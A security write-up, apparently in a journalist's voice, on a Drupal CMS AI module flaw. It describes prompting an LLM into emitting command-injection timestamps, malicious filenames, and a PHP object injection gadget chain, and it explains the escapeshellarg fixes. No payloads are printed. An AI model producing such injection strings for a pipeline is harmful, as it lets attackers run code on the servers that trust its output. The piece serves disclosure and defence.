Exploiting the AI Module in Drupal CMS: A Tale of Command Injection and PHP Object Injection

In March 2025, the Drupal Security Team released a critical update to address a Remote Code Execution vulnerability in the Artificial Intelligence (AI) contributed module, which is included in Drupal CMS. As a curious journalist, I decided to dig deeper into this vulnerability and explore its implications.

The problem lies in the insufficient validation of unsafe input, specifically in the AI Automators submodule. This vulnerability can be exploited through two interesting vectors. Firstly, by manipulating timestamps generated by the Large Language Model (LLM) used for video analysis, an attacker can inject malicious commands into the shell. Secondly, by uploading a malicious filename to a file field, an attacker can execute arbitrary commands on the server.

The Vulnerable Code: A Recipe for Command Injection

The vulnerable code is in the AI Automators submodule, where the module uses ffmpeg to process video files. The module generates shell commands including the path to the uploaded input file and timestamps provided by the LLM. An example of the vulnerable code reveals that there is insufficient validation of unsafe input, allowing an attacker to inject malicious commands.

One of the most interesting aspects of this vulnerability is how it can be exploited using a ChatGPT instance. By crafting a specific prompt, an attacker can trick the LLM into generating timestamps that will be used in a Command Injection attack. The module then uses these timestamps to generate a shell command without proper sanitization, leading to successful Command Injection.

Exploiting the Vulnerability with a Malicious Filename

Another way to achieve Command Injection is by uploading a malicious filename to a file field. Since Drupal does not default-sanitize filenames, an attacker can exploit this vulnerability by sending a malicious HTTP request using a tool like BurpSuite. The resulting filename can be used to inject a Command Injection payload into the shell.

In my tests with a vanilla install of Drupal CMS, I was able to achieve Command Injection without even interacting with the LLM. This highlights the importance of input validation and sanitization, especially for data coming from untrusted sources like LLMs.

The "Gadget Chain" Vulnerability: A Recipe for Remote Code Execution

In addition to the initial vulnerability, there is another closely related issue that can be exploited to achieve Arbitrary File Deletion and possibly even Remote Code Execution. This vulnerability is known as a "Gadget Chain" or POP chain.

The problem lies in the PHP Object Injection (POI) vulnerability, where an attacker can control the value of the $tmpDir property. By exploiting this vulnerability, an attacker can delete files on the server without having to set up a workflow with the vulnerable automation. Furthermore, if the attacker can upload a file with a Command Injection payload embedded in the filename, they can use that to escalate the exploitation of this Gadget Chain to full Remote Code Execution.

The Fixes: Sanitizing Input and Preventing PHP Object Injection

The fixes for these vulnerabilities involve using PHP's escapeshellarg (and related functions) to ensure that unsafe input is sanitized before being passed to the underlying shell. This prevents Command Injection attacks and ensures that inputs coming from untrusted sources, including LLMs, are properly validated.

I would like to thank Marcus in particular for his help investigating and remediating these issues. His response to being contacted by the Drupal Security Team was exemplary. It's essential to emphasize that data from all potentially untrusted sources should be subject to input validation, including not only Internet-facing web clients but also backend feeds over extranets.

The Takeaway: Input Validation is Key

The vulnerabilities in the AI module highlight the importance of input validation and sanitization, especially when dealing with untrusted data sources like LLMs. By taking these precautions, we can prevent Command Injection attacks and PHP Object Injection exploits, ensuring that our web applications are secure and reliable.

In conclusion, this vulnerability serves as a reminder to always prioritize input validation and sanitization, even in seemingly innocuous parts of our codebase.